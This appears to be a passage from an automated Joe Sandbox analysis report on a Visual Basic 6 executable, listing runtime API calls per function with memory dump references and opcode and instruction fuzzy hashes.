                  • __vbaVarDup.MSVBVM60(?,?,00000000), ref: 004FDBB9
                  • __vbaLenVar.MSVBVM60(?,?,?,?,00000000), ref: 004FDBC6
                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,?,00000000), ref: 004FDBCC
                  • __vbaStrVarVal.MSVBVM60(?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDBFA
                  • #631.MSVBVM60(00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC00
                  • __vbaVarCat.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC1B
                  • __vbaVarMove.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC25
                  • __vbaFreeStr.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC2D
                  • __vbaFreeVarList.MSVBVM60(00000002,?,00000008,?,?,?,00000000,?,?,?,?,00000000,?,?,?,?), ref: 004FDC3B
                  • __vbaFreeVar.MSVBVM60(004FDC87,00000000,?,?,?,?,00000000), ref: 004FDC81
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Free$#631ListMove
                  • String ID: @#P
                  • API String ID: 1551574828-1511617095
                  • Opcode ID: a9317fb0db360dc0b8a8a9f36d8d9ba5e34fcf096d05c5082b2716a1a26e784a
                  • Instruction ID: f60660588a085a5caeefaff03f02179ed6989bd2b64e490b811c6095d12225c3
                  • Opcode Fuzzy Hash: a9317fb0db360dc0b8a8a9f36d8d9ba5e34fcf096d05c5082b2716a1a26e784a
                  • Instruction Fuzzy Hash: 942119B2C0024CAACB04EFE6C885ADEBBBCAF08704F10812BF615FB191EA785545CF54
                  APIs
                  • __vbaStrCopy.MSVBVM60 ref: 004FB467
                  • #526.MSVBVM60(?,00000104), ref: 004FB476
                  • __vbaStrVarMove.MSVBVM60(?,?,00000104), ref: 004FB47F
                  • __vbaStrMove.MSVBVM60(?,?,00000104), ref: 004FB489
                  • __vbaFreeVar.MSVBVM60(?,?,00000104), ref: 004FB491
                    • Part of subcall function 004FFB2A: __vbaVarVargNofree.MSVBVM60 ref: 004FFB60
                    • Part of subcall function 004FFB2A: __vbaStrVarVal.MSVBVM60(00000000,00000000), ref: 004FFB6A
                    • Part of subcall function 004FFB2A: #644.MSVBVM60(00000000,00000000,00000000), ref: 004FFB70
                    • Part of subcall function 004FFB2A: __vbaFreeStr.MSVBVM60(00000000,00000000,00000000), ref: 004FFB7B
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4CE
                  • #616.MSVBVM60(?,00000000,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4DB
                  • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4E5
                  • __vbaStrCopy.MSVBVM60(?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4F4
                  • __vbaStrCopy.MSVBVM60(?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4FF
                  • __vbaFreeStr.MSVBVM60(004FB533,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB525
                  • __vbaFreeStr.MSVBVM60(004FB533,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB52D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Free$CopyMove$#526#616#644ErrorNofreeSystemVarg
                  • String ID:
                  • API String ID: 1295617847-0
                  • Opcode ID: cc0998b9db657e4b1e33251e6c76b87a9dd65f9d87d7b5b559844c1325e696f5
                  • Instruction ID: 4b075d06cefa5015de2cea9b86b394a0e3bd998eb9dd3ac40033cb8f85621fee
                  • Opcode Fuzzy Hash: cc0998b9db657e4b1e33251e6c76b87a9dd65f9d87d7b5b559844c1325e696f5
                  • Instruction Fuzzy Hash: E331CD71D011089BCB15EFE6C9829EEBBB9EF18304F50413FE605B7291DB385A45CB99
                  APIs
                  • __vbaVarVargNofree.MSVBVM60 ref: 004FAEB6
                  • __vbaStrVarVal.MSVBVM60(?,00000000), ref: 004FAEC0
                  • #644.MSVBVM60(00000000,?,00000000), ref: 004FAEC6
                  • __vbaSetSystemError.MSVBVM60(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAEE3
                  • __vbaFreeStr.MSVBVM60(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAEEB
                  • __vbaAryLock.MSVBVM60(?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAF0E
                  • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,00000000,?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000), ref: 004FAF2B
                  • __vbaAryUnlock.MSVBVM60(?,00000000,?,?,?,00000000,?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 004FAF34
                  • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAF3F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$ErrorSystem$#644FreeLockNofreeUnlockVarg
                  • String ID: @"P
                  • API String ID: 1674366042-1124221702
                  • Opcode ID: 9297d036060c78d04d4a8be4b36407a6eb36a4ff46a4b14be117996e5083b9b6
                  • Instruction ID: 55e0d61b71a9d108b2d6ba83f28d853850005754b8c31afce63f7689023b8828
                  • Opcode Fuzzy Hash: 9297d036060c78d04d4a8be4b36407a6eb36a4ff46a4b14be117996e5083b9b6
                  • Instruction Fuzzy Hash: 212115B5901218ABCB14EFA5CD46E9EB7BCEF08714F10411AF504B7291C678AA008BA9
                  APIs
                  • __vbaNew2.MSVBVM60(00409A00,00503364), ref: 004FE1F7
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C964,000002B0), ref: 004FE24B
                  • __vbaNew2.MSVBVM60(0040C9C4,00503BA8), ref: 004FE262
                  • __vbaNew2.MSVBVM60(00409A00,00503364), ref: 004FE27F
                  • __vbaObjSetAddref.MSVBVM60(00000000), ref: 004FE290
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000010), ref: 004FE2A9
                  • __vbaFreeObj.MSVBVM60 ref: 004FE2B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$New2$CheckHresult$AddrefFree
                  • String ID: `#P$`#P
                  • API String ID: 2792052285-498400788
                  • Opcode ID: cec386dcab4af89c840fbeacf8b82dd46d9aa4483b554efbf3051b4d886c3665
                  • Instruction ID: 4052b10ba84fb7bb084cc6bfabaa2bef48cab23df0a1f422f13b2d25cbbdfc04
                  • Opcode Fuzzy Hash: cec386dcab4af89c840fbeacf8b82dd46d9aa4483b554efbf3051b4d886c3665
                  • Instruction Fuzzy Hash: 2D31A170900708FFCB01EF6ACC86BAE7BB8BF09715F10442AF601BB2E1C6785545CA99
                  APIs
                  • __vbaVarDup.MSVBVM60(?,?,?), ref: 004FAB86
                  • #644.MSVBVM60(?,?,?), ref: 004FAB91
                  • __vbaI4Var.MSVBVM60(?,00000000,?,?,?), ref: 004FAB9B
                  • #698.MSVBVM60(?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 004FABD4
                  • __vbaVarCat.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABE5
                  • __vbaVarMove.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABEF
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABF7
                  • __vbaVarAdd.MSVBVM60(?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC1E
                  • __vbaVarMove.MSVBVM60(?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC28
                  • __vbaFreeVar.MSVBVM60(004FAC63,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC5D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$FreeMove$#644#698
                  • String ID:
                  • API String ID: 674645869-0
                  • Opcode ID: ca0fcf941a29d05972b4687a39160fdfec10ea9df9ad026500247ea666b91e31
                  • Instruction ID: 843a9af323782a1e8ec9acdb8992f9b74832ee7e913ded6d512d3c3ca07667d0
                  • Opcode Fuzzy Hash: ca0fcf941a29d05972b4687a39160fdfec10ea9df9ad026500247ea666b91e31
                  • Instruction Fuzzy Hash: D73161B5D01248ABCB11EFD5C981ADEB7BDBB18704F60013FB605B72A1D6386B0ACB55
                  APIs
                  • __vbaObjSetAddref.MSVBVM60(?,00502300,0040BEAC,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FD342
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 004FD36B
                  • #526.MSVBVM60(?,00007FFF), ref: 004FD385
                  • __vbaStrVarMove.MSVBVM60(?,?,00007FFF), ref: 004FD38E
                  • __vbaStrMove.MSVBVM60(?,?,00007FFF), ref: 004FD398
                  • __vbaFreeVar.MSVBVM60(?,?,00007FFF), ref: 004FD3A0
                  • #644.MSVBVM60(?,?,?,00007FFF), ref: 004FD3A8
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FD3D2
                  • __vbaFreeObj.MSVBVM60(004FD3FE,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 004FD3F8
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$CheckFreeHresultMove$#526#644Addref
                  • String ID:
                  • API String ID: 3607658185-0
                  • Opcode ID: 464c82a357c2343bb659ab53c8af77b301269f7fdae60c949a7c9ac6595e9320
                  • Instruction ID: 48b061f47ae894beafa627ec204288505a1a07ddecc0fdafbb64daeb47b10728
                  • Opcode Fuzzy Hash: 464c82a357c2343bb659ab53c8af77b301269f7fdae60c949a7c9ac6595e9320
                  • Instruction Fuzzy Hash: 79212A71D0021DABCF04EB95CC46EAFBB7AFF48B04F10452AF701B62A1D778A5058B99
                  APIs
                  • #593.MSVBVM60(?), ref: 004FE3DD
                  • __vbaNew2.MSVBVM60(0040CC40,?,?), ref: 004FE3F6
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040CC30,00000024), ref: 004FE416
                  • __vbaR8IntI4.MSVBVM60(00000000,?,0040CC30,00000024), ref: 004FE427
                  • __vbaFreeVar.MSVBVM60(00000000,?,0040CC30,00000024), ref: 004FE432
                  • __vbaNew2.MSVBVM60(0040AC34,005033DC), ref: 004FE449
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040CB70,000006FC), ref: 004FE46F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$CheckHresultNew2$#593Free
                  • String ID:
                  • API String ID: 2147906589-0
                  • Opcode ID: cbfc631e05a34efd2f922cba0dc4ce40c2cd455f486ba8eae33f39e0543d2186
                  • Instruction ID: c58023b431af339495e757aa362484ba1d8cd1898518df1627ef99c8a6378f6f
                  • Opcode Fuzzy Hash: cbfc631e05a34efd2f922cba0dc4ce40c2cd455f486ba8eae33f39e0543d2186
                  • Instruction Fuzzy Hash: 3021A1B0541219FBCB10AF92DD8AADE7BB8FF09745F10052EF104B75A1C7B86904CA99
                  APIs
                  • __vbaStrCat.MSVBVM60(0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB2FE
                  • __vbaStrMove.MSVBVM60(0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB308
                  • __vbaStrCat.MSVBVM60(0040BEA0,00000000,0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB313
                  • __vbaStrMove.MSVBVM60(0040BEA0,00000000,0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB31D
                  • __vbaI4Str.MSVBVM60(00000000,0040BEA0,00000000,0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB323
                  • __vbaSetSystemError.MSVBVM60(000000FF,00000000,00000000,0040BEA0,00000000,0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB330
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,000000FF,00000000,00000000,0040BEA0,00000000,0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB33F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Move$ErrorFreeListSystem
                  • String ID:
                  • API String ID: 3013914016-0
                  • Opcode ID: 448b01fc3d8c0d261208059594efe13bcfe9d2dbee30402c65e783a46aa5fd4e
                  • Instruction ID: 46b0c2a8571a8c386f4af7a4d9249c1d95d028fdae5a0a7923a1290111d38a8c
                  • Opcode Fuzzy Hash: 448b01fc3d8c0d261208059594efe13bcfe9d2dbee30402c65e783a46aa5fd4e
                  • Instruction Fuzzy Hash: FC0144B5D402096AD704EBA5CC43FBF76BCEB09704F20023BB711B65D2E678590586E9
                  APIs
                  • __vbaVarVargNofree.MSVBVM60 ref: 004FB08E
                  • __vbaStrVarVal.MSVBVM60(?,00000000), ref: 004FB098
                  • #644.MSVBVM60(00000000,?,00000000), ref: 004FB09E
                  • __vbaVarMove.MSVBVM60(00000000,?,00000000), ref: 004FB0B3
                  • __vbaFreeStr.MSVBVM60(00000000,?,00000000), ref: 004FB0BB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$#644FreeMoveNofreeVarg
                  • String ID: `"P
                  • API String ID: 4093157337-2068776422
                  • Opcode ID: 8bc5b615c7b25cf412e4c79563c0073754f66f9a790e8da39697553812b34b84
                  • Instruction ID: 0209cf69d2a01a5617c20b319aee73f37e35b577f12764baf66fd4787d48d3eb
                  • Opcode Fuzzy Hash: 8bc5b615c7b25cf412e4c79563c0073754f66f9a790e8da39697553812b34b84
                  • Instruction Fuzzy Hash: B401E4B1C00208AECB04EFA5C986ADEBFF8FF1C714F10412AE505B6691EB7855498BA5
                  APIs
                  • __vbaRedim.MSVBVM60(00000080,00000001,00503340,00000011,00000001,00004000,00000000,0040BEAC,00000080,00000000,?,?,004FEF83,00000000,0040BEAC,00000080), ref: 004FF05E
                  • __vbaAryLock.MSVBVM60(?,00503340,0040BEAC), ref: 004FF099
                  • #644.MSVBVM60(?,?,00503340,0040BEAC), ref: 004FF0B0
                  • __vbaAryUnlock.MSVBVM60(?,?,?,00503340,0040BEAC), ref: 004FF0BB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$#644LockRedimUnlock
                  • String ID: @3P
                  • API String ID: 3120749027-282812438
                  • Opcode ID: 6c56408341afe6ce80f2b41602f392f00ab1dc42bda323abeb62ea65931c6704
                  • Instruction ID: 17d2c46d9555b6335bc1a554783d5138d4e97924127e696c63463a8f8f4870db
                  • Opcode Fuzzy Hash: 6c56408341afe6ce80f2b41602f392f00ab1dc42bda323abeb62ea65931c6704
                  • Instruction Fuzzy Hash: 6A218E75910209AFCB14DF94C985F6EBBB9FF08704F148169E2006B3A2D6B9AD44CB54
                  APIs
                  • __vbaVarVargNofree.MSVBVM60 ref: 004FFB60
                  • __vbaStrVarVal.MSVBVM60(00000000,00000000), ref: 004FFB6A
                  • #644.MSVBVM60(00000000,00000000,00000000), ref: 004FFB70
                  • __vbaFreeStr.MSVBVM60(00000000,00000000,00000000), ref: 004FFB7B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$#644FreeNofreeVarg
                  • String ID: p$P
                  • API String ID: 1185345826-825426192
                  • Opcode ID: 4e1f357f71960cc191139a3533fb859c30b21aad1b1931bc43690e11ee25c411
                  • Instruction ID: 7836de18134fb4dd7652f6dfee1493c86dc6f5af55631b9e800786055baf4676
                  • Opcode Fuzzy Hash: 4e1f357f71960cc191139a3533fb859c30b21aad1b1931bc43690e11ee25c411
                  • Instruction Fuzzy Hash: 92F03AB1810208ABCB04EBA5C94AFEFBFBCEF18715F50012AB20176592D77869448AA5
                  APIs
                    • Part of subcall function 004FF016: __vbaRedim.MSVBVM60(00000080,00000001,00503340,00000011,00000001,00004000,00000000,0040BEAC,00000080,00000000,?,?,004FEF83,00000000,0040BEAC,00000080), ref: 004FF05E
                    • Part of subcall function 004FF016: __vbaAryLock.MSVBVM60(?,00503340,0040BEAC), ref: 004FF099
                    • Part of subcall function 004FF016: #644.MSVBVM60(?,?,00503340,0040BEAC), ref: 004FF0B0
                    • Part of subcall function 004FF016: __vbaAryUnlock.MSVBVM60(?,?,?,00503340,0040BEAC), ref: 004FF0BB
                  • #644.MSVBVM60(?,00000000,0040BEAC,00000080), ref: 004FEF8D
                  • #644.MSVBVM60(?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFA5
                  • #644.MSVBVM60(00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFC5
                  • #644.MSVBVM60(00000000,00000000,00000000,00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFD7
                  • #644.MSVBVM60(00000000,00000000,00000000,00000000,00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFE3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: #644$__vba$LockRedimUnlock
                  • String ID:
                  • API String ID: 1414640885-0
                  • Opcode ID: 317673dbd47c54470bb08f1437a09c970dad7a930685ead75c0a7c072fb8d865
                  • Instruction ID: 51d5c8c719c9f0f4d8c7753107f273c6214d421ceb11882ef4af490040c30773
                  • Opcode Fuzzy Hash: 317673dbd47c54470bb08f1437a09c970dad7a930685ead75c0a7c072fb8d865
                  • Instruction Fuzzy Hash: C311BAB0C0020AAADF14EFA1CD4AEEFBBB9EB15349F10452AB500B6652D77C5A058A65
                  APIs
                  • #644.MSVBVM60(00000000,004FA88C,00000001), ref: 004FAABE
                  • #644.MSVBVM60(00000001,00000000,004FA88C,00000001), ref: 004FAACC
                  • #644.MSVBVM60(00000000,00000000,00000000,00000001,00000000,004FA88C,00000001), ref: 004FAAE1
